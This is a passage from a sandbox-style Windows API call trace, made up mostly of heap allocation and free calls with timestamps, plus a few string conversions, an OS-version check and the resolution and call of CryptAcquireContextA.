dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0088.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0088.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0088.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0088.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.332] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0088.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0088.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0088.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0088.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0088.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.332] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0088.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a684b0 [0088.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0088.333] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0088.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0088.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0088.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96a0 [0088.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684b0 | out: hHeap=0x2af0000) returned 1 [0088.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0088.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0088.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0088.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0088.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0088.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.334] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.334] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.334] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.334] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0088.334] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0088.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.335] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0088.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0088.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0088.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0088.337] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContext") returned 0x0 [0088.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0088.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0088.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0088.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6098 [0088.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0088.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0088.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15) returned 0x29f7100 [0088.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7100, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0088.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0088.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0088.337] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContextA") returned 0x763afc40 [0088.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0088.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6098 | out: hHeap=0x2af0000) returned 1 [0088.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0088.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0088.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0088.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0088.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0088.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0088.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0088.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0088.338] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9961a8) returned 1 [0088.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0088.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0088.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0088.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0088.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0088.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0088.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0088.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0088.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0088.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0088.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0088.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0088.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0088.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0088.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0088.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0088.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0088.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0088.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0088.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 